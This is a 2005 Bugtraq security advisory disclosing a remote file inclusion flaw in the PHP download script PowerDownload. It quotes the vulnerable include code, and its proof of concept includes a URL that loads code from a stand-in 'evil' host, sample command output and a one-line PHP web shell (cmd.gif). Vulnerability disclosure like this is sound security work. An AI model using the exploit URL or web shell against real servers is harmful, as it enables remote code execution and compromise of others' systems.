[39038] in bugtraq
PowerDownload Remote File Inclusion
daemon@ATHENA.MIT.EDU (SoulBlack Group)
Tue May 31 12:38:31 2005
Message-ID: <bf9e91160505302005d75bdcc@mail.gmail.com>
Date: Tue, 31 May 2005 00:05:34 -0300
From: SoulBlack Group <soulblacktm@gmail.com>
Reply-To: SoulBlack Group <soulblacktm@gmail.com>
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com,
news@securiteam.com, sec@soulblack.com.ar, bugs@securitytracker.com,
submissions@packetstormsecurity.org, vuln@secunia.com,
alerts_advisories@net-security.org
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
===========================================================
============================================================
Title: PowerDownload Remote File Inclusion.
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 31/05/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: v3.0.2 & v3.0.3
vendor: http://www.powerscripts.org/
============================================================
============================================================
* Summary *
PowerDownload is a PHP and mySQL based Download Script.
-------------------------------------------------------------
* Problem Description *
The bug reside in $incdir var in pdl-inc/pdl_header.inc.php
Vulnerable Code
// Include required Files
if(!isset($incdir)) $incdir = "";
require($incdir."pdl-inc/pdl_config.inc.php");
require($incdir."pdl-inc/pdl_db_class_".strtolower($config_sql_type).".inc.php");
require($incdir."pdl-inc/pdl_functions.inc.php");
/*
http://server/download/downloads.php?release_id=650&incdir=http://evil/cmd.gif?&cmd=uname%20-a
Linux webserver101 2.4.21-243-athlon #1 Thu Aug 12 15:24:15 UTC 2004 i686 athlon
*/
/*
-------
cmd.gif
-------
<?
system($cmd);
?>
*/
-------------------------------------------------------------
-------------------------------------------------------------
* Fix *
Contact the Vendor.
-------------------------------------------------------------
* References *
http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt
-------------------------------------------------------------
* Credits *
Vulnerability reported by SoulBlack Security Research
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar